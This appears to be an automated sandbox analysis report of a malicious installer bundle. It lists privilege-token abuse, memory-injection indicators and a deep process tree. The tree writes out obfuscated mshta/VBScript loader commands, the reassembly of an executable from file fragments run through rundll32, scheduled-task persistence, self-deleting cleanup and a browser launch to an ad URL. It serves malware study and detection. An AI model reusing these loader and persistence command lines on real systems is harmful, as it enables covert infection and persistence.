WerFault.exe Token: SeShutdownPrivilege 2244 svchost.exe Token: SeCreatePagefilePrivilege 2244 svchost.exe Token: SeCreateTokenPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe Token: SeAssignPrimaryTokenPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe Token: SeLockMemoryPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe Token: SeIncreaseQuotaPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe Token: SeMachineAccountPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe Token: SeTcbPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe Token: SeSecurityPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe Token: SeTakeOwnershipPrivilege 5072 _ekxTvwgZamWC0lFanNMmU5Q.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1488 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4936 wrote to memory of 1164 4936 setup_x86_x64_install.exe 85 PID 4936 wrote to memory of 1164 4936 setup_x86_x64_install.exe 85 PID 4936 wrote to memory of 1164 4936 setup_x86_x64_install.exe 85 PID 1164 wrote to memory of 1876 1164 setup_installer.exe 88 PID 1164 wrote to memory of 1876 1164 setup_installer.exe 88 PID 1164 wrote to memory of 1876 1164 setup_installer.exe 88 PID 1876 wrote to memory of 1496 1876 setup_install.exe 93 PID 1876 wrote to memory of 1496 1876 setup_install.exe 93 PID 1876 wrote to memory of 1496 1876 setup_install.exe 93 PID 1876 wrote to memory of 2772 1876 setup_install.exe 92 PID 1876 wrote to memory of 2772 1876 setup_install.exe 92 PID 1876 wrote to memory of 2772 1876 setup_install.exe 92 PID 1876 wrote to memory of 1772 1876 setup_install.exe 94 PID 1876 wrote to memory of 1772 1876 setup_install.exe 94 PID 1876 wrote to memory of 1772 1876 setup_install.exe 94 PID 1876 wrote to memory of 1944 1876 setup_install.exe 100 PID 1876 wrote to memory of 1944 1876 setup_install.exe 100 PID 1876 wrote to memory of 1944 1876 setup_install.exe 100 PID 1876 wrote to memory of 2296 1876 setup_install.exe 95 PID 1876 wrote to memory of 2296 1876 setup_install.exe 95 PID 1876 wrote to memory of 2296 1876 setup_install.exe 95 PID 1876 wrote to memory of 2004 1876 setup_install.exe 99 PID 1876 wrote to memory of 2004 1876 setup_install.exe 99 PID 1876 wrote to memory of 2004 1876 setup_install.exe 99 PID 1496 wrote to memory of 1816 1496 cmd.exe 96 PID 1496 wrote to memory of 1816 1496 cmd.exe 96 PID 1496 wrote to memory of 1816 1496 cmd.exe 96 PID 1876 wrote to memory of 2220 1876 setup_install.exe 97 PID 1876 wrote to memory of 2220 1876 setup_install.exe 97 PID 1876 wrote to memory of 2220 1876 setup_install.exe 97 PID 1876 wrote to memory of 2268 1876 setup_install.exe 98 PID 1876 wrote to memory of 2268 1876 setup_install.exe 98 PID 1876 wrote to memory of 2268 1876 setup_install.exe 98 PID 1772 wrote to memory of 2288 1772 cmd.exe 101 PID 1772 wrote to memory of 2288 1772 cmd.exe 101 PID 1772 wrote to memory of 2288 1772 cmd.exe 101 PID 1876 wrote to memory of 4432 1876 setup_install.exe 114 PID 1876 wrote to memory of 4432 1876 setup_install.exe 114 PID 1876 wrote to memory of 4432 1876 setup_install.exe 114 PID 2772 wrote to memory of 4440 2772 cmd.exe 102 PID 2772 wrote to memory of 4440 2772 cmd.exe 102 PID 2772 wrote to memory of 4440 2772 cmd.exe 102 PID 1876 wrote to memory of 2924 1876 setup_install.exe 103 PID 1876 wrote to memory of 2924 1876 setup_install.exe 103 PID 1876 wrote to memory of 2924 1876 setup_install.exe 103 PID 1944 wrote to memory of 2696 1944 cmd.exe 104 PID 1944 wrote to memory of 2696 1944 cmd.exe 104 PID 1876 wrote to memory of 2832 1876 setup_install.exe 113 PID 1876 wrote to memory of 2832 1876 setup_install.exe 113 PID 1876 wrote to memory of 2832 1876 setup_install.exe 113 PID 1876 wrote to memory of 832 1876 setup_install.exe 105 PID 1876 wrote to memory of 832 1876 setup_install.exe 105 PID 1876 wrote to memory of 832 1876 setup_install.exe 105 PID 2268 wrote to memory of 2644 2268 cmd.exe 112 PID 2268 wrote to memory of 2644 2268 cmd.exe 112 PID 2004 wrote to memory of 4012 2004 cmd.exe 109 PID 2004 wrote to memory of 4012 2004 cmd.exe 109 PID 2004 wrote to memory of 4012 2004 cmd.exe 109 PID 2296 wrote to memory of 3192 2296 cmd.exe 111 PID 2296 wrote to memory of 3192 2296 cmd.exe 111 PID 2296 wrote to memory of 3192 2296 cmd.exe 111 PID 4432 wrote to memory of 3408 4432 cmd.exe 110 PID 4432 wrote to memory of 3408 4432 cmd.exe 110 PID 4432 wrote to memory of 3408 4432 cmd.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4440 -
C:\Users\Admin\Pictures\Adobe Films\twTtfAdLpgiNh5FPj0A3Gcxc.exe"C:\Users\Admin\Pictures\Adobe Films\twTtfAdLpgiNh5FPj0A3Gcxc.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1336
-
-
C:\Users\Admin\Pictures\Adobe Films\WcVpRA6kvlzSEmdGvqjbB0Dn.exe"C:\Users\Admin\Pictures\Adobe Films\WcVpRA6kvlzSEmdGvqjbB0Dn.exe"6⤵
- Executes dropped EXE
PID:4928 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 2767⤵
- Program crash
PID:5336
-
-
-
C:\Users\Admin\Pictures\Adobe Films\d8s_vcvLeJHz5kX3rVpv8Cot.exe"C:\Users\Admin\Pictures\Adobe Films\d8s_vcvLeJHz5kX3rVpv8Cot.exe"6⤵PID:492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\d8s_vcvLeJHz5kX3rVpv8Cot.exe" & exit7⤵PID:2056
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:5940
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lBks8kf0i8is5oB59zHNckNP.exe"C:\Users\Admin\Pictures\Adobe Films\lBks8kf0i8is5oB59zHNckNP.exe"6⤵
- Executes dropped EXE
PID:1360 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"8⤵PID:7132
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fl.exe"9⤵PID:2056
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"10⤵PID:6272
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"11⤵
- Creates scheduled task(s)
PID:13356
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services32.exe"10⤵PID:476
-
C:\Users\Admin\AppData\Roaming\services32.exeC:\Users\Admin\AppData\Roaming\services32.exe11⤵PID:4524
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Roaming\services32.exe"12⤵PID:9152
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"13⤵PID:9844
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"14⤵PID:12496
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe"C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe"6⤵
- Executes dropped EXE
PID:2752 -
C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe"C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe"7⤵PID:6088
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ht4b1kMQDJTAQUu6jtvotLZc.exe"C:\Users\Admin\Pictures\Adobe Films\ht4b1kMQDJTAQUu6jtvotLZc.exe"6⤵
- Executes dropped EXE
PID:3344 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
PID:5080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 3007⤵
- Program crash
PID:5284
-
-
-
C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe"C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
PID:564 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵PID:5140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ("C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe") do taskkill /f /Im "%~nxQ"8⤵PID:5328
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /Im "J1q35wdLcxMrnOSriyYy5IEs.exe"9⤵
- Kills process with taskkill
PID:5908
-
-
C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K99⤵
- Executes dropped EXE
PID:5900 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))10⤵PID:5240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ("C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE") do taskkill /f /Im "%~nxQ"11⤵PID:1040
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL"). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg+ pgMY8C.~+ nmS1._ ..\SmD2fE1.N& STart control ..\SMD2fE1.N &DeL /Q * " , 0, TrUE ) )10⤵PID:5648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg+ pgMY8C.~+ nmS1._ ..\SmD2fE1.N& STart control ..\SMD2fE1.N &DeL /Q *11⤵PID:6132
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"12⤵PID:2176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵PID:2180
-
-
C:\Windows\SysWOW64\control.execontrol ..\SMD2fE1.N12⤵PID:5464
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\SMD2fE1.N13⤵PID:4072
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\SMD2fE1.N14⤵
- Executes dropped EXE
PID:5624 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\SMD2fE1.N15⤵PID:2556
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\l08VHlGOLkq0TzbCK9JiJJtg.exe"C:\Users\Admin\Pictures\Adobe Films\l08VHlGOLkq0TzbCK9JiJJtg.exe"6⤵
- Executes dropped EXE
PID:2292 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:2512
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵PID:2176
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Delays execution with timeout.exe
PID:5604
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_ekxTvwgZamWC0lFanNMmU5Q.exe"C:\Users\Admin\Pictures\Adobe Films\_ekxTvwgZamWC0lFanNMmU5Q.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Users\Admin\Pictures\Adobe Films\6b_vNP8cDwOVEu6IafVzBnjk.exe"C:\Users\Admin\Pictures\Adobe Films\6b_vNP8cDwOVEu6IafVzBnjk.exe"6⤵PID:5420
-
-
C:\Users\Admin\Pictures\Adobe Films\GihaLJZGxMz9DKv2M4XNuj85.exe"C:\Users\Admin\Pictures\Adobe Films\GihaLJZGxMz9DKv2M4XNuj85.exe"6⤵PID:5508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 2687⤵
- Drops file in Program Files directory
- Program crash
- Suspicious use of FindShellTrayWindow
PID:1488
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OcEWcAnUdEdEvlsJaukOw_VW.exe"C:\Users\Admin\Pictures\Adobe Films\OcEWcAnUdEdEvlsJaukOw_VW.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5496 -
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:4736
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵PID:6080
-
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵PID:6036
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1iJ8eO2w6hONeHtu_Lt0y0Pp.exe"C:\Users\Admin\Pictures\Adobe Films\1iJ8eO2w6hONeHtu_Lt0y0Pp.exe"6⤵
- Executes dropped EXE
PID:5636
-
-
C:\Users\Admin\Pictures\Adobe Films\sMz6x2WXTbbQiIqzd_8p_K7R.exe"C:\Users\Admin\Pictures\Adobe Films\sMz6x2WXTbbQiIqzd_8p_K7R.exe"6⤵PID:5624
-
-
C:\Users\Admin\Pictures\Adobe Films\rHAI58nO1XJ3oqBogfiEKfPH.exe"C:\Users\Admin\Pictures\Adobe Films\rHAI58nO1XJ3oqBogfiEKfPH.exe"6⤵
- Executes dropped EXE
PID:5616
-
-
C:\Users\Admin\Pictures\Adobe Films\tI0JEeYCuX6F_Dz1vYAR787H.exe"C:\Users\Admin\Pictures\Adobe Films\tI0JEeYCuX6F_Dz1vYAR787H.exe"6⤵
- Executes dropped EXE
PID:5592
-
-
C:\Users\Admin\Pictures\Adobe Films\KdmvzomAEKR_2M6jz2bTNhF4.exe"C:\Users\Admin\Pictures\Adobe Films\KdmvzomAEKR_2M6jz2bTNhF4.exe"6⤵
- Executes dropped EXE
PID:5584
-
-
C:\Users\Admin\Pictures\Adobe Films\XYvz2d7hNO61WhDcadQ_hx8G.exe"C:\Users\Admin\Pictures\Adobe Films\XYvz2d7hNO61WhDcadQ_hx8G.exe"6⤵
- Executes dropped EXE
PID:5576 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1648
-
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵PID:908
-
C:\Users\Admin\Pictures\Adobe Films\PakmBXCVXJ5vn_jy_boeq9U9.exe"C:\Users\Admin\Pictures\Adobe Films\PakmBXCVXJ5vn_jy_boeq9U9.exe"8⤵PID:5208
-
-
C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe"C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5044 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵PID:3328
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe" ) do taskkill /f -Im "%~nXw"10⤵PID:5404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "z2E8PvIdDUT1UN282zxROevH.exe"11⤵
- Kills process with taskkill
PID:5928
-
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
- Executes dropped EXE
PID:5420 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵PID:5628
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵PID:6004
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵PID:6224
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *13⤵PID:6340
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵PID:6688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵PID:6696
-
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵PID:6980
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵PID:7092
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
- Executes dropped EXE
PID:492 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵PID:1584
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe"C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe"8⤵PID:1800
-
C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe"C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe"9⤵PID:5852
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iBdul3EEPApoZ06K3YuNVg9J.exe"C:\Users\Admin\Pictures\Adobe Films\iBdul3EEPApoZ06K3YuNVg9J.exe"8⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exe"9⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exe10⤵PID:6584
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ndUpt90X_jf8ngw2fzLkzUsX.exe"C:\Users\Admin\Pictures\Adobe Films\ndUpt90X_jf8ngw2fzLkzUsX.exe"8⤵PID:3064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 19889⤵
- Program crash
PID:4032
-
-
-
C:\Users\Admin\Pictures\Adobe Films\X62wPDSNMydsu_VfgkVahVPI.exe"C:\Users\Admin\Pictures\Adobe Films\X62wPDSNMydsu_VfgkVahVPI.exe" /mixtwo8⤵PID:3940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 3009⤵
- Program crash
PID:4288
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ciU0eOMLu8jjlu1AjtGnGJpq.exe"C:\Users\Admin\Pictures\Adobe Films\ciU0eOMLu8jjlu1AjtGnGJpq.exe"8⤵PID:5744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 3129⤵
- Program crash
PID:5604
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ahjDd7_w119nH9fHoO_4fNcU.exe"C:\Users\Admin\Pictures\Adobe Films\ahjDd7_w119nH9fHoO_4fNcU.exe"8⤵PID:4608
-
-
C:\Users\Admin\Pictures\Adobe Films\EWB5sHkOwNc9URy4gjPDbthG.exe"C:\Users\Admin\Pictures\Adobe Films\EWB5sHkOwNc9URy4gjPDbthG.exe"8⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\is-4JTJE.tmp\EWB5sHkOwNc9URy4gjPDbthG.tmp"C:\Users\Admin\AppData\Local\Temp\is-4JTJE.tmp\EWB5sHkOwNc9URy4gjPDbthG.tmp" /SL5="$30260,3619787,58368,C:\Users\Admin\Pictures\Adobe Films\EWB5sHkOwNc9URy4gjPDbthG.exe"9⤵PID:1204
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lBlYR3NdMAKI0hmQ_KTahCaR.exe"C:\Users\Admin\Pictures\Adobe Films\lBlYR3NdMAKI0hmQ_KTahCaR.exe"8⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\is-E17VQ.tmp\lBlYR3NdMAKI0hmQ_KTahCaR.tmp"C:\Users\Admin\AppData\Local\Temp\is-E17VQ.tmp\lBlYR3NdMAKI0hmQ_KTahCaR.tmp" /SL5="$402F0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\lBlYR3NdMAKI0hmQ_KTahCaR.exe"9⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\is-RPPJE.tmp\Adam.exe"C:\Users\Admin\AppData\Local\Temp\is-RPPJE.tmp\Adam.exe" /S /UID=270910⤵PID:6576
-
C:\Program Files\Reference Assemblies\VBIAUDLDAG\foldershare.exe"C:\Program Files\Reference Assemblies\VBIAUDLDAG\foldershare.exe" /VERYSILENT11⤵PID:6608
-
-
C:\Users\Admin\AppData\Local\Temp\87-a84b0-159-60b9c-0a725b2c99cb7\Pofolopaedi.exe"C:\Users\Admin\AppData\Local\Temp\87-a84b0-159-60b9c-0a725b2c99cb7\Pofolopaedi.exe"11⤵PID:1580
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵PID:1380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9e99646f8,0x7ff9e9964708,0x7ff9e996471813⤵PID:1716
-
-
